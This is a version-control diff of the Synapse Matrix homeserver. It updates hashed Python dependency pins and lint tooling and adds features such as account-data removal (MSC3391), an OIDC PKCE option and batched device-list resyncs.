--hash=sha256:c5c1362c14aee73f50143d74389b2c158707b4abce2cb055b7ad37ce60738d47 \
--hash=sha256:cb362e3b0976dc994857391b776ddaa8c13c28a16f80ac6522c23d5257156bed \
--hash=sha256:d197df5489004db87d90b918033edbeee0bd6df3848a204bca3ff0a903bef837 \
--hash=sha256:d3b56206244dc8711f7e8b7d6cad4663917cd5b2d950799425076681e8766286 \
--hash=sha256:d5b2f8a31bd43e0f18172d8ac82347c8f37ef3e0b414431157718aa234991b28 \
--hash=sha256:d7081c084ceb58278dd3cf81f836bc818978c0ccc770cbbb202125ddabec6628 \
--hash=sha256:db74f5562c09953b2c5f8ec4b7dfd3f5421f31811e97d1dbc0a7c93d6e3a24df \
--hash=sha256:df41112ccce5d47770a0c13651479fbcd8793f34232a2dd9faeccb75eb5d0d0d \
--hash=sha256:e1339790c083c5a4de48f688b4841f18df839eb3c9584a770cbd818b33e26d5d \
--hash=sha256:e621b0246192d3b9cb1dc62c78cfa4c6f6d2ddc0ec207d43c0dedecb914f152a \
--hash=sha256:e8c5cf126889a4de385c02a2c3d3aba4b00f70234bfddae82a5eaa3ee6d5e3e6 \
--hash=sha256:e9d7747847c53a16a729b6ee5e737cf170f7a16611c143d95aa60a109a59c336 \
--hash=sha256:eaef5d2de3c7e9b21f1e762f289d17b726c2239a42b11e25446abf82b26ac132 \
--hash=sha256:ed3e4b4e1e6de75fdc16d3259098de7c6571b1a6cc863b1a49e7d3d53e036070 \
--hash=sha256:ef21af928e807f10bf4141cad4746eee692a0dd3ff56cfb25fce076ec3cc8abe \
--hash=sha256:f09598b416ba39a8f489c124447b007fe865f786a89dbfa48bb5cf395693132a \
--hash=sha256:f0caf4a5dcf610d96c3bd32932bfac8aee61c96e60481c2a0ea58da435e25acd \
--hash=sha256:f6e78171be3fb7941f9910ea15b4b14ec27725865a73c15277bc39f5ca4f8391 \
--hash=sha256:f715c32e774a60a337b2bb8ad9839b4abf75b267a0f18806f6f4f5f1688c4b5a \
--hash=sha256:fb5c1ad6bad98c57482236a21bf985ab0ef42bd51f7ad4e4538e89a997624e12
pkgutil-resolve-name==1.3.10 ; python_full_version >= "3.7.1" and python_version < "3.9" \
--hash=sha256:357d6c9e6a755653cfd78893817c0853af365dd51ec97f3d358a819373bbd174 \
--hash=sha256:ca27cc078d25c5ad71a9de0a7a330146c4e014c2462d9af19c6b828280649c5e
@ -541,43 +571,43 @@ pyasn1==0.4.8 ; python_full_version >= "3.7.1" and python_full_version < "4.0.0"
pycparser==2.21 ; python_full_version >= "3.7.1" and python_full_version < "4.0.0" \
--hash=sha256:8ee45429555515e1f6b185e78100aea234072576aa43ab53aefcae078162fca9 \
--hash=sha256:e644fdec12f7872f86c58ff790da456218b10f863970249516d60a5eaca77206
pydantic==1.10.2 ; python_full_version >= "3.7.1" and python_full_version < "4.0.0" \
--hash=sha256:05e00dbebbe810b33c7a7362f231893183bcc4251f3f2ff991c31d5c08240c42 \
--hash=sha256:06094d18dd5e6f2bbf93efa54991c3240964bb663b87729ac340eb5014310624 \
--hash=sha256:0b959f4d8211fc964772b595ebb25f7652da3f22322c007b6fed26846a40685e \
--hash=sha256:19b3b9ccf97af2b7519c42032441a891a5e05c68368f40865a90eb88833c2559 \
--hash=sha256:1b6ee725bd6e83ec78b1aa32c5b1fa67a3a65badddde3976bca5fe4568f27709 \
--hash=sha256:1ee433e274268a4b0c8fde7ad9d58ecba12b069a033ecc4645bb6303c062d2e9 \
--hash=sha256:216f3bcbf19c726b1cc22b099dd409aa371f55c08800bcea4c44c8f74b73478d \
--hash=sha256:2d0567e60eb01bccda3a4df01df677adf6b437958d35c12a3ac3e0f078b0ee52 \
--hash=sha256:2e05aed07fa02231dbf03d0adb1be1d79cabb09025dd45aa094aa8b4e7b9dcda \
--hash=sha256:352aedb1d71b8b0736c6d56ad2bd34c6982720644b0624462059ab29bd6e5912 \
--hash=sha256:355639d9afc76bcb9b0c3000ddcd08472ae75318a6eb67a15866b87e2efa168c \
--hash=sha256:37c90345ec7dd2f1bcef82ce49b6235b40f282b94d3eec47e801baf864d15525 \
--hash=sha256:4b8795290deaae348c4eba0cebb196e1c6b98bdbe7f50b2d0d9a4a99716342fe \
--hash=sha256:5760e164b807a48a8f25f8aa1a6d857e6ce62e7ec83ea5d5c5a802eac81bad41 \
--hash=sha256:6eb843dcc411b6a2237a694f5e1d649fc66c6064d02b204a7e9d194dff81eb4b \
--hash=sha256:7b5ba54d026c2bd2cb769d3468885f23f43710f651688e91f5fb1edcf0ee9283 \
--hash=sha256:7c2abc4393dea97a4ccbb4ec7d8658d4e22c4765b7b9b9445588f16c71ad9965 \
--hash=sha256:81a7b66c3f499108b448f3f004801fcd7d7165fb4200acb03f1c2402da73ce4c \
--hash=sha256:91b8e218852ef6007c2b98cd861601c6a09f1aa32bbbb74fab5b1c33d4a1e410 \
--hash=sha256:9300fcbebf85f6339a02c6994b2eb3ff1b9c8c14f502058b5bf349d42447dcf5 \
--hash=sha256:9cabf4a7f05a776e7793e72793cd92cc865ea0e83a819f9ae4ecccb1b8aa6116 \
--hash=sha256:a1f5a63a6dfe19d719b1b6e6106561869d2efaca6167f84f5ab9347887d78b98 \
--hash=sha256:a4c805731c33a8db4b6ace45ce440c4ef5336e712508b4d9e1aafa617dc9907f \
--hash=sha256:ae544c47bec47a86bc7d350f965d8b15540e27e5aa4f55170ac6a75e5f73b644 \
--hash=sha256:b97890e56a694486f772d36efd2ba31612739bc6f3caeee50e9e7e3ebd2fdd13 \
--hash=sha256:bb6ad4489af1bac6955d38ebcb95079a836af31e4c4f74aba1ca05bb9f6027bd \
--hash=sha256:bedf309630209e78582ffacda64a21f96f3ed2e51fbf3962d4d488e503420254 \
--hash=sha256:c1ba1afb396148bbc70e9eaa8c06c1716fdddabaf86e7027c5988bae2a829ab6 \
--hash=sha256:c33602f93bfb67779f9c507e4d69451664524389546bacfe1bee13cae6dc7488 \
--hash=sha256:c4aac8e7103bf598373208f6299fa9a5cfd1fc571f2d40bf1dd1955a63d6eeb5 \
--hash=sha256:c6f981882aea41e021f72779ce2a4e87267458cc4d39ea990729e21ef18f0f8c \
--hash=sha256:cc78cc83110d2f275ec1970e7a831f4e371ee92405332ebfe9860a715f8336e1 \
--hash=sha256:d49f3db871575e0426b12e2f32fdb25e579dea16486a26e5a0474af87cb1ab0a \
--hash=sha256:dd3f9a40c16daf323cf913593083698caee97df2804aa36c4b3175d5ac1b92a2 \
--hash=sha256:e0bedafe4bc165ad0a56ac0bd7695df25c50f76961da29c050712596cf092d6d \
--hash=sha256:e9069e1b01525a96e6ff49e25876d90d5a563bc31c658289a8772ae186552236
pydantic==1.10.4 ; python_full_version >= "3.7.1" and python_full_version < "4.0.0" \
--hash=sha256:05a81b006be15655b2a1bae5faa4280cf7c81d0e09fcb49b342ebf826abe5a72 \
--hash=sha256:0b53e1d41e97063d51a02821b80538053ee4608b9a181c1005441f1673c55423 \
--hash=sha256:2b3ce5f16deb45c472dde1a0ee05619298c864a20cded09c4edd820e1454129f \
--hash=sha256:2e82a6d37a95e0b1b42b82ab340ada3963aea1317fd7f888bb6b9dfbf4fff57c \
--hash=sha256:301d626a59edbe5dfb48fcae245896379a450d04baeed50ef40d8199f2733b06 \
--hash=sha256:39f4a73e5342b25c2959529f07f026ef58147249f9b7431e1ba8414a36761f53 \
--hash=sha256:4948f264678c703f3877d1c8877c4e3b2e12e549c57795107f08cf70c6ec7774 \
--hash=sha256:4b05697738e7d2040696b0a66d9f0a10bec0efa1883ca75ee9e55baf511909d6 \
--hash=sha256:51bdeb10d2db0f288e71d49c9cefa609bca271720ecd0c58009bd7504a0c464c \
--hash=sha256:55b1625899acd33229c4352ce0ae54038529b412bd51c4915349b49ca575258f \
--hash=sha256:572066051eeac73d23f95ba9a71349c42a3e05999d0ee1572b7860235b850cc6 \
--hash=sha256:6a05a9db1ef5be0fe63e988f9617ca2551013f55000289c671f71ec16f4985e3 \
--hash=sha256:6dc1cc241440ed7ca9ab59d9929075445da6b7c94ced281b3dd4cfe6c8cff817 \
--hash=sha256:6e7124d6855b2780611d9f5e1e145e86667eaa3bd9459192c8dc1a097f5e9903 \
--hash=sha256:75d52162fe6b2b55964fbb0af2ee58e99791a3138588c482572bb6087953113a \
--hash=sha256:78cec42b95dbb500a1f7120bdf95c401f6abb616bbe8785ef09887306792e66e \
--hash=sha256:7feb6a2d401f4d6863050f58325b8d99c1e56f4512d98b11ac64ad1751dc647d \
--hash=sha256:8775d4ef5e7299a2f4699501077a0defdaac5b6c4321173bcb0f3c496fbadf85 \
--hash=sha256:887ca463c3bc47103c123bc06919c86720e80e1214aab79e9b779cda0ff92a00 \
--hash=sha256:9193d4f4ee8feca58bc56c8306bcb820f5c7905fd919e0750acdeeeef0615b28 \
--hash=sha256:983e720704431a6573d626b00662eb78a07148c9115129f9b4351091ec95ecc3 \
--hash=sha256:990406d226dea0e8f25f643b370224771878142155b879784ce89f633541a024 \
--hash=sha256:9cbdc268a62d9a98c56e2452d6c41c0263d64a2009aac69246486f01b4f594c4 \
--hash=sha256:a48f1953c4a1d9bd0b5167ac50da9a79f6072c63c4cef4cf2a3736994903583e \
--hash=sha256:a9a6747cac06c2beb466064dda999a13176b23535e4c496c9d48e6406f92d42d \
--hash=sha256:a9f2de23bec87ff306aef658384b02aa7c32389766af3c5dee9ce33e80222dfa \
--hash=sha256:b5635de53e6686fe7a44b5cf25fcc419a0d5e5c1a1efe73d49d48fe7586db854 \
--hash=sha256:b6f9d649892a6f54a39ed56b8dfd5e08b5f3be5f893da430bed76975f3735d15 \
--hash=sha256:b9a3859f24eb4e097502a3be1fb4b2abb79b6103dd9e2e0edb70613a4459a648 \
--hash=sha256:cd8702c5142afda03dc2b1ee6bc358b62b3735b2cce53fc77b31ca9f728e4bc8 \
--hash=sha256:d7b5a3821225f5c43496c324b0d6875fde910a1c2933d726a743ce328fbb2a8c \
--hash=sha256:d88c4c0e5c5dfd05092a4b271282ef0588e5f4aaf345778056fc5259ba098857 \
--hash=sha256:eb992a1ef739cc7b543576337bebfc62c0e6567434e522e97291b251a41dad7f \
--hash=sha256:f2f7eb6273dd12472d7f218e1fef6f7c7c2f00ac2e1ecde4db8824c457300416 \
--hash=sha256:fdf88ab63c3ee282c76d652fc86518aacb737ff35796023fae56a65ced1a5978 \
--hash=sha256:fdf8d759ef326962b4678d89e275ffc55b7ce59d917d9f72233762061fd04a2d
pymacaroons==0.13.0 ; python_full_version >= "3.7.1" and python_full_version < "4.0.0" \
--hash=sha256:1e6bba42a5f66c245adf38a5a4006a99dcc06a0703786ea636098667d42903b8 \
--hash=sha256:3e14dff6a262fdbf1a15e769ce635a8aea72e6f8f91e408f9a97166c53b91907
@ -592,9 +622,9 @@ pynacl==1.5.0 ; python_full_version >= "3.7.1" and python_full_version < "4.0.0"
--hash=sha256:a36d4a9dda1f19ce6e03c9a784a2921a4b726b02e1c736600ca9c22029474394 \
--hash=sha256:a422368fc821589c228f4c49438a368831cb5bbc0eab5ebe1d7fac9dded6567b \
--hash=sha256:e46dae94e34b085175f8abb3b0aaa7da40767865ac82c928eeb9e57e1ea8a543
pyopenssl==22.1.0 ; python_full_version >= "3.7.1" and python_full_version < "4.0.0" \
--hash=sha256:7a83b7b272dd595222d672f5ce29aa030f1fb837630ef229f62e72e395ce8968 \
--hash=sha256:b28437c9773bb6c6958628cf9c3bebe585de661dba6f63df17111966363dd15e
pyopenssl==23.0.0 ; python_full_version >= "3.7.1" and python_full_version < "4.0.0" \
--hash=sha256:c1cc5f86bcacefc84dada7d31175cae1b1518d5f60d3d0bb595a67822a868a6f \
--hash=sha256:df5fc28af899e74e19fccb5510df423581047e10ab6f1f4ba1763ff5fde844c0
pyrsistent==0.18.1 ; python_full_version >= "3.7.1" and python_full_version < "4.0.0" \
--hash=sha256:0e3e1fcc45199df76053026a51cc59ab2ea3fc7c094c6627e93b7b44cdae2c8c \
--hash=sha256:1b34eedd6812bf4d33814fca1b66005805d3640ce53140ab8bbb1e2651b0d9bc \
@ -670,9 +700,9 @@ service-identity==21.1.0 ; python_full_version >= "3.7.1" and python_full_versio
setuptools-rust==1.5.2 ; python_full_version >= "3.7.1" and python_full_version < "4.0.0" \
--hash=sha256:8eb45851e34288f2296cd5ab9e924535ac1757318b730a13fe6836867843f206 \
--hash=sha256:d8daccb14dc0eae1b6b6eb3ecef79675bd37b4065369f79c35393dd5c55652c7
setuptools==65.3.0 ; python_full_version >= "3.7.1" and python_full_version < "4.0.0" \
--hash=sha256:2e24e0bec025f035a2e72cdd1961119f557d78ad331bb00ff82efb2ab8da8e82 \
--hash=sha256:7732871f4f7fa58fb6bdcaeadb0161b2bd046c85905dbaa066bdcbcc81953b57
setuptools==65.5.1 ; python_full_version >= "3.7.1" and python_full_version < "4.0.0" \
--hash=sha256:d0b9a8433464d5800cbe05094acf5c6d52a91bfac9b52bcfc4d41382be5d5d31 \
--hash=sha256:e197a19aa8ec9722928f2206f8de752def0e4c9fc6953527360d1c36d94ddb2f
signedjson==1.1.4 ; python_full_version >= "3.7.1" and python_full_version < "4.0.0" \
--hash=sha256:45569ec54241c65d2403fe3faf7169be5322547706a231e884ca2b427f23d228 \
--hash=sha256:cd91c56af53f169ef032c62e9c4a3292dc158866933318d0592e3462db3d6492

View File

@ -190,7 +190,7 @@ fi
extra_test_args=()
test_tags="synapse_blacklist,msc3787,msc3874"
test_tags="synapse_blacklist,msc3787,msc3874,msc3391"
# All environment variables starting with PASS_ will be shared.
# (The prefix is stripped off before reaching the container.)

View File

@ -1,9 +1,8 @@
#!/usr/bin/env bash
#
# Runs linting scripts over the local Synapse checkout
# isort - sorts import statements
# black - opinionated code formatter
# flake8 - lints and finds mistakes
# ruff - lints and finds mistakes
set -e
@ -105,6 +104,7 @@ set -x
isort "${files[@]}"
python3 -m black "${files[@]}"
./scripts-dev/config-lint.sh
flake8 "${files[@]}"
# --quiet suppresses the update check.
ruff --quiet "${files[@]}"
./scripts-dev/check_pydantic_models.py lint
mypy

View File

@ -14,6 +14,8 @@
# Stub for frozendict.
from __future__ import annotations
from typing import Any, Hashable, Iterable, Iterator, Mapping, Tuple, TypeVar, overload
_KT = TypeVar("_KT", bound=Hashable) # Key type.

View File

@ -14,6 +14,8 @@
# Stub for PyICU.
from __future__ import annotations
class Locale:
@staticmethod
def getDefault() -> Locale: ...

View File

@ -2,6 +2,8 @@
# https://github.com/grantjenks/python-sortedcontainers/blob/eea42df1f7bad2792e8da77335ff888f04b9e5ae/sortedcontainers/sorteddict.pyi
# (from https://github.com/grantjenks/python-sortedcontainers/pull/107)
from __future__ import annotations
from typing import (
Any,
Callable,

View File

@ -2,6 +2,8 @@
# https://github.com/grantjenks/python-sortedcontainers/blob/a419ffbd2b1c935b09f11f0971696e537fd0c510/sortedcontainers/sortedlist.pyi
# (from https://github.com/grantjenks/python-sortedcontainers/pull/107)
from __future__ import annotations
from typing import (
Any,
Callable,

View File

@ -2,6 +2,8 @@
# https://github.com/grantjenks/python-sortedcontainers/blob/d0a225d7fd0fb4c54532b8798af3cbeebf97e2d5/sortedcontainers/sortedset.pyi
# (from https://github.com/grantjenks/python-sortedcontainers/pull/107)
from __future__ import annotations
from typing import (
AbstractSet,
Any,

View File

@ -1307,7 +1307,7 @@ def main() -> None:
sqlite_config = {
"name": "sqlite3",
"args": {
"database": args.sqlite_database,
"database": "file:{}?mode=rw".format(args.sqlite_database),
"cp_min": 1,
"cp_max": 1,
"check_same_thread": False,

View File

@ -351,13 +351,13 @@ class Filter:
self.not_rel_types = filter_json.get("org.matrix.msc3874.not_rel_types", [])
def filters_all_types(self) -> bool:
return "*" in self.not_types
return self.types == [] or "*" in self.not_types
def filters_all_senders(self) -> bool:
return "*" in self.not_senders
return self.senders == [] or "*" in self.not_senders
def filters_all_rooms(self) -> bool:
return "*" in self.not_rooms
return self.rooms == [] or "*" in self.not_rooms
def _check(self, event: FilterEvent) -> bool:
"""Checks whether the filter matches the given event.
@ -450,8 +450,8 @@ class Filter:
if any(map(match_func, disallowed_values)):
return False
# Other the event does not match at least one of the allowed values,
# reject it.
# Otherwise if the event does not match at least one of the allowed
# values, reject it.
allowed_values = getattr(self, name)
if allowed_values is not None:
if not any(map(match_func, allowed_values)):

View File

@ -1,3 +1,5 @@
from __future__ import annotations
import argparse
from typing import (
Any,

View File

@ -16,7 +16,7 @@ import logging
import os
import re
import threading
from typing import Any, Callable, Dict, Optional
from typing import Any, Callable, Dict, Mapping, Optional
import attr
@ -94,7 +94,7 @@ def add_resizable_cache(
class CacheConfig(Config):
section = "caches"
_environ = os.environ
_environ: Mapping[str, str] = os.environ
event_cache_size: int
cache_factors: Dict[str, float]

View File

@ -136,3 +136,6 @@ class ExperimentalConfig(Config):
# Enable room version (and thus applicable push rules from MSC3931/3932)
version_id = RoomVersions.MSC1767v10.identifier
KNOWN_ROOM_VERSIONS[version_id] = RoomVersions.MSC1767v10
# MSC3391: Removing account data.
self.msc3391_enabled = experimental.get("msc3391_enabled", False)

View File

@ -117,6 +117,7 @@ OIDC_PROVIDER_CONFIG_SCHEMA = {
# to avoid importing authlib here.
"enum": ["client_secret_basic", "client_secret_post", "none"],
},
"pkce_method": {"type": "string", "enum": ["auto", "always", "never"]},
"scopes": {"type": "array", "items": {"type": "string"}},
"authorization_endpoint": {"type": "string"},
"token_endpoint": {"type": "string"},
@ -289,6 +290,7 @@ def _parse_oidc_config_dict(
client_secret=oidc_config.get("client_secret"),
client_secret_jwt_key=client_secret_jwt_key,
client_auth_method=oidc_config.get("client_auth_method", "client_secret_basic"),
pkce_method=oidc_config.get("pkce_method", "auto"),
scopes=oidc_config.get("scopes", ["openid"]),
authorization_endpoint=oidc_config.get("authorization_endpoint"),
token_endpoint=oidc_config.get("token_endpoint"),
@ -357,6 +359,10 @@ class OidcProviderConfig:
# 'none'.
client_auth_method: str
# Whether to enable PKCE when exchanging the authorization & token.
# Valid values are 'auto', 'always', and 'never'.
pkce_method: str
# list of scopes to request
scopes: Collection[str]

View File

@ -17,10 +17,12 @@ import random
from typing import TYPE_CHECKING, Awaitable, Callable, Collection, List, Optional, Tuple
from synapse.replication.http.account_data import (
ReplicationAddRoomAccountDataRestServlet,
ReplicationAddTagRestServlet,
ReplicationAddUserAccountDataRestServlet,
ReplicationRemoveRoomAccountDataRestServlet,
ReplicationRemoveTagRestServlet,
ReplicationRoomAccountDataRestServlet,
ReplicationUserAccountDataRestServlet,
ReplicationRemoveUserAccountDataRestServlet,
)
from synapse.streams import EventSource
from synapse.types import JsonDict, StreamKeyType, UserID
@ -41,8 +43,18 @@ class AccountDataHandler:
self._instance_name = hs.get_instance_name()
self._notifier = hs.get_notifier()
self._user_data_client = ReplicationUserAccountDataRestServlet.make_client(hs)
self._room_data_client = ReplicationRoomAccountDataRestServlet.make_client(hs)
self._add_user_data_client = (
ReplicationAddUserAccountDataRestServlet.make_client(hs)
)
self._remove_user_data_client = (
ReplicationRemoveUserAccountDataRestServlet.make_client(hs)
)
self._add_room_data_client = (
ReplicationAddRoomAccountDataRestServlet.make_client(hs)
)
self._remove_room_data_client = (
ReplicationRemoveRoomAccountDataRestServlet.make_client(hs)
)
self._add_tag_client = ReplicationAddTagRestServlet.make_client(hs)
self._remove_tag_client = ReplicationRemoveTagRestServlet.make_client(hs)
self._account_data_writers = hs.config.worker.writers.account_data
@ -112,7 +124,7 @@ class AccountDataHandler:
return max_stream_id
else:
response = await self._room_data_client(
response = await self._add_room_data_client(
instance_name=random.choice(self._account_data_writers),
user_id=user_id,
room_id=room_id,
@ -121,15 +133,59 @@ class AccountDataHandler:
)
return response["max_stream_id"]
async def remove_account_data_for_room(
self, user_id: str, room_id: str, account_data_type: str
) -> Optional[int]:
"""
Deletes the room account data for the given user and account data type.
"Deleting" account data merely means setting the content of the account data
to an empty JSON object: {}.
Args:
user_id: The user ID to remove room account data for.
room_id: The room ID to target.
account_data_type: The account data type to remove.
Returns:
The maximum stream ID, or None if the room account data item did not exist.
"""
if self._instance_name in self._account_data_writers:
max_stream_id = await self._store.remove_account_data_for_room(
user_id, room_id, account_data_type
)
if max_stream_id is None:
# The referenced account data did not exist, so no delete occurred.
return None
self._notifier.on_new_event(
StreamKeyType.ACCOUNT_DATA, max_stream_id, users=[user_id]
)
# Notify Synapse modules that the content of the type has changed to an
# empty dictionary.
await self._notify_modules(user_id, room_id, account_data_type, {})
return max_stream_id
else:
response = await self._remove_room_data_client(
instance_name=random.choice(self._account_data_writers),
user_id=user_id,
room_id=room_id,
account_data_type=account_data_type,
content={},
)
return response["max_stream_id"]
async def add_account_data_for_user(
self, user_id: str, account_data_type: str, content: JsonDict
) -> int:
"""Add some global account_data for a user.
Args:
user_id: The user to add a tag for.
user_id: The user to add some account data for.
account_data_type: The type of account_data to add.
content: A json object to associate with the tag.
content: The content json dictionary.
Returns:
The maximum stream ID.
@ -148,7 +204,7 @@ class AccountDataHandler:
return max_stream_id
else:
response = await self._user_data_client(
response = await self._add_user_data_client(
instance_name=random.choice(self._account_data_writers),
user_id=user_id,
account_data_type=account_data_type,
@ -156,6 +212,45 @@ class AccountDataHandler:
)
return response["max_stream_id"]
async def remove_account_data_for_user(
self, user_id: str, account_data_type: str
) -> Optional[int]:
"""Removes a piece of global account_data for a user.
Args:
user_id: The user to remove account data for.
account_data_type: The type of account_data to remove.
Returns:
The maximum stream ID, or None if the room account data item did not exist.
"""
if self._instance_name in self._account_data_writers:
max_stream_id = await self._store.remove_account_data_for_user(
user_id, account_data_type
)
if max_stream_id is None:
# The referenced account data did not exist, so no delete occurred.
return None
self._notifier.on_new_event(
StreamKeyType.ACCOUNT_DATA, max_stream_id, users=[user_id]
)
# Notify Synapse modules that the content of the type has changed to an
# empty dictionary.
await self._notify_modules(user_id, None, account_data_type, {})
return max_stream_id
else:
response = await self._remove_user_data_client(
instance_name=random.choice(self._account_data_writers),
user_id=user_id,
account_data_type=account_data_type,
content={},
)
return response["max_stream_id"]
async def add_tag_to_room(
self, user_id: str, room_id: str, tag: str, content: JsonDict
) -> int:

View File

@ -2031,7 +2031,7 @@ class PasswordAuthProvider:
self.is_3pid_allowed_callbacks: List[IS_3PID_ALLOWED_CALLBACK] = []
# Mapping from login type to login parameters
self._supported_login_types: Dict[str, Iterable[str]] = {}
self._supported_login_types: Dict[str, Tuple[str, ...]] = {}
# Mapping from login type to auth checker callbacks
self.auth_checker_callbacks: Dict[str, List[CHECK_AUTH_CALLBACK]] = {}

View File

@ -14,6 +14,7 @@
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from http import HTTPStatus
from typing import (
TYPE_CHECKING,
Any,
@ -33,6 +34,7 @@ from synapse.api.errors import (
Codes,
FederationDeniedError,
HttpResponseException,
InvalidAPICallError,
RequestSendFailed,
SynapseError,
)
@ -45,6 +47,7 @@ from synapse.types import (
JsonDict,
StreamKeyType,
StreamToken,
UserID,
get_domain_from_id,
get_verify_key_from_cross_signing_key,
)
@ -893,12 +896,47 @@ class DeviceListWorkerUpdater:
def __init__(self, hs: "HomeServer"):
from synapse.replication.http.devices import (
ReplicationMultiUserDevicesResyncRestServlet,
ReplicationUserDevicesResyncRestServlet,
)
self._user_device_resync_client = (
ReplicationUserDevicesResyncRestServlet.make_client(hs)
)
self._multi_user_device_resync_client = (
ReplicationMultiUserDevicesResyncRestServlet.make_client(hs)
)
async def multi_user_device_resync(
self, user_ids: List[str], mark_failed_as_stale: bool = True
) -> Dict[str, Optional[JsonDict]]:
"""
Like `user_device_resync` but operates on multiple users **from the same origin**
at once.
Returns:
Dict from User ID to the same Dict as `user_device_resync`.
"""
# mark_failed_as_stale is not sent. Ensure this doesn't break expectations.
assert mark_failed_as_stale
if not user_ids:
# Shortcut empty requests
return {}
try:
return await self._multi_user_device_resync_client(user_ids=user_ids)
except SynapseError as err:
if not (
err.code == HTTPStatus.NOT_FOUND and err.errcode == Codes.UNRECOGNIZED
):
raise
# Fall back to single requests
result: Dict[str, Optional[JsonDict]] = {}
for user_id in user_ids:
result[user_id] = await self._user_device_resync_client(user_id=user_id)
return result
async def user_device_resync(
self, user_id: str, mark_failed_as_stale: bool = True
@ -913,8 +951,10 @@ class DeviceListWorkerUpdater:
A dict with device info as under the "devices" in the result of this
request:
https://matrix.org/docs/spec/server_server/r0.1.2#get-matrix-federation-v1-user-devices-userid
None when we weren't able to fetch the device info for some reason,
e.g. due to a connection problem.
"""
return await self._user_device_resync_client(user_id=user_id)
return (await self.multi_user_device_resync([user_id]))[user_id]
class DeviceListUpdater(DeviceListWorkerUpdater):
@ -1160,19 +1200,66 @@ class DeviceListUpdater(DeviceListWorkerUpdater):
# Allow future calls to retry resyncinc out of sync device lists.
self._resync_retry_in_progress = False
async def multi_user_device_resync(
self, user_ids: List[str], mark_failed_as_stale: bool = True
) -> Dict[str, Optional[JsonDict]]:
"""
Like `user_device_resync` but operates on multiple users **from the same origin**
at once.
Returns:
Dict from User ID to the same Dict as `user_device_resync`.
"""
if not user_ids:
return {}
origins = {UserID.from_string(user_id).domain for user_id in user_ids}
if len(origins) != 1:
raise InvalidAPICallError(f"Only one origin permitted, got {origins!r}")
result = {}
failed = set()
# TODO(Perf): Actually batch these up
for user_id in user_ids:
user_result, user_failed = await self._user_device_resync_returning_failed(
user_id
)
result[user_id] = user_result
if user_failed:
failed.add(user_id)
if mark_failed_as_stale:
await self.store.mark_remote_users_device_caches_as_stale(failed)
return result
async def user_device_resync(
self, user_id: str, mark_failed_as_stale: bool = True
) -> Optional[JsonDict]:
result, failed = await self._user_device_resync_returning_failed(user_id)
if failed and mark_failed_as_stale:
# Mark the remote user's device list as stale so we know we need to retry
# it later.
await self.store.mark_remote_users_device_caches_as_stale((user_id,))
return result
async def _user_device_resync_returning_failed(
self, user_id: str
) -> Tuple[Optional[JsonDict], bool]:
"""Fetches all devices for a user and updates the device cache with them.
Args:
user_id: The user's id whose device_list will be updated.
mark_failed_as_stale: Whether to mark the user's device list as stale
if the attempt to resync failed.
Returns:
A dict with device info as under the "devices" in the result of this
request:
https://matrix.org/docs/spec/server_server/r0.1.2#get-matrix-federation-v1-user-devices-userid
- A dict with device info as under the "devices" in the result of this
request:
https://matrix.org/docs/spec/server_server/r0.1.2#get-matrix-federation-v1-user-devices-userid
None when we weren't able to fetch the device info for some reason,
e.g. due to a connection problem.
- True iff the resync failed and the device list should be marked as stale.
"""
logger.debug("Attempting to resync the device list for %s", user_id)
log_kv({"message": "Doing resync to update device list."})
@ -1181,12 +1268,7 @@ class DeviceListUpdater(DeviceListWorkerUpdater):
try:
result = await self.federation.query_user_devices(origin, user_id)
except NotRetryingDestination:
if mark_failed_as_stale:
# Mark the remote user's device list as stale so we know we need to retry
# it later.
await self.store.mark_remote_user_device_cache_as_stale(user_id)
return None
return None, True
except (RequestSendFailed, HttpResponseException) as e:
logger.warning(
"Failed to handle device list update for %s: %s",
@ -1194,23 +1276,18 @@ class DeviceListUpdater(DeviceListWorkerUpdater):
e,
)
if mark_failed_as_stale:
# Mark the remote user's device list as stale so we know we need to retry
# it later.
await self.store.mark_remote_user_device_cache_as_stale(user_id)
# We abort on exceptions rather than accepting the update
# as otherwise synapse will 'forget' that its device list
# is out of date. If we bail then we will retry the resync
# next time we get a device list update for this user_id.
# This makes it more likely that the device lists will
# eventually become consistent.
return None
return None, True
except FederationDeniedError as e:
set_tag("error", True)
log_kv({"reason": "FederationDeniedError"})
logger.info(e)
return None
return None, False
except Exception as e:
set_tag("error", True)
log_kv(
@ -1218,12 +1295,7 @@ class DeviceListUpdater(DeviceListWorkerUpdater):
)
logger.exception("Failed to handle device list update for %s", user_id)
if mark_failed_as_stale:
# Mark the remote user's device list as stale so we know we need to retry
# it later.
await self.store.mark_remote_user_device_cache_as_stale(user_id)
return None
return None, True
log_kv({"result": result})
stream_id = result["stream_id"]
devices = result["devices"]
@ -1305,7 +1377,7 @@ class DeviceListUpdater(DeviceListWorkerUpdater):
# point.
self._seen_updates[user_id] = {stream_id}
return result
return result, False
async def process_cross_signing_key_update(
self,

View File

@ -195,7 +195,7 @@ class DeviceMessageHandler:
sender_user_id,
unknown_devices,
)
await self.store.mark_remote_user_device_cache_as_stale(sender_user_id)
await self.store.mark_remote_users_device_caches_as_stale((sender_user_id,))
# Immediately attempt a resync in the background
run_in_background(self._user_device_resync, user_id=sender_user_id)

View File

@ -36,8 +36,8 @@ from synapse.types import (
get_domain_from_id,
get_verify_key_from_cross_signing_key,
)
from synapse.util import json_decoder, unwrapFirstError
from synapse.util.async_helpers import Linearizer, delay_cancellation
from synapse.util import json_decoder
from synapse.util.async_helpers import Linearizer, concurrently_execute
from synapse.util.cancellation import cancellable
from synapse.util.retryutils import NotRetryingDestination
@ -238,24 +238,28 @@ class E2eKeysHandler:
# Now fetch any devices that we don't have in our cache
# TODO It might make sense to propagate cancellations into the
# deferreds which are querying remote homeservers.
await make_deferred_yieldable(
delay_cancellation(
defer.gatherResults(
[
run_in_background(
self._query_devices_for_destination,
results,
cross_signing_keys,
failures,
destination,
queries,
timeout,
)
for destination, queries in remote_queries_not_in_cache.items()
],
consumeErrors=True,
).addErrback(unwrapFirstError)
logger.debug(
"%d destinations to query devices for", len(remote_queries_not_in_cache)
)
async def _query(
destination_queries: Tuple[str, Dict[str, Iterable[str]]]
) -> None:
destination, queries = destination_queries
return await self._query_devices_for_destination(
results,
cross_signing_keys,
failures,
destination,
queries,
timeout,
)
await concurrently_execute(
_query,
remote_queries_not_in_cache.items(),
10,
delay_cancellation=True,
)
ret = {"device_keys": results, "failures": failures}
@ -300,28 +304,41 @@ class E2eKeysHandler:
# queries. We use the more efficient batched query_client_keys for all
# remaining users
user_ids_updated = []
for (user_id, device_list) in destination_query.items():
if user_id in user_ids_updated:
continue
if device_list:
continue
